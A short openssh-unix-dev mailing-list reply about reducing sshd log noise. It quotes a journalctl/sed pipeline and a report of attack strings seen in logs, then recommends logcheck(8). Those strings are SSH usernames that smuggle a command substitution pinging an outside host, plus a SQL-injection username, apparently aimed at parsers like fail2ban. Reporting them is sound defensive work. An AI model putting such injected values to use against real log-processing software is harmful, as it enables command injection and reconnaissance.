Minimize sshd log clutter/spam from unauthenticated connections

Keine Eile keine-eile at e-mail.de
Mon Mar 20 02:46:14 AEDT 2023


[...]

> journalctl -t sshd -o cat \
>      | grep -v '^Accepted ' \
>      | sed -E 's/[Uu]ser \S+/user .../' \
>      | sed -E 's/[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/0.0.0.0/' \
>      | sed -E 's/port\s+[0-9]+/port 0/' \
>      | sed -E 's/".*"/"..."/' \
>      | sed -E 's/Change of username or service not allowed: .+/Change of username or service not allowed: .../' \
>      | sed -E 's/Their offer: .+/Their offer: .../' \
>      | sort -u
> 
> I found a select few attempts to mess with, identify, or exploit log parsing IDS/IPS software like fail2ban (and feel confirmed in my choice of an alternative solution with far less attack surface, see my other mail):
> 
> Invalid user $(ping -c 1 16e939dc.ad.xspzo.com) from ...
> Invalid user ' $(ping -c 1 16e939dc.ad.xspzo.com) from ...
> Invalid user ' or '1'='1' - from 176.100.42.41
[...]

May I suggest, you take a look at logcheck(8). It seems, that this what you are looking for.



More information about the openssh-unix-dev mailing list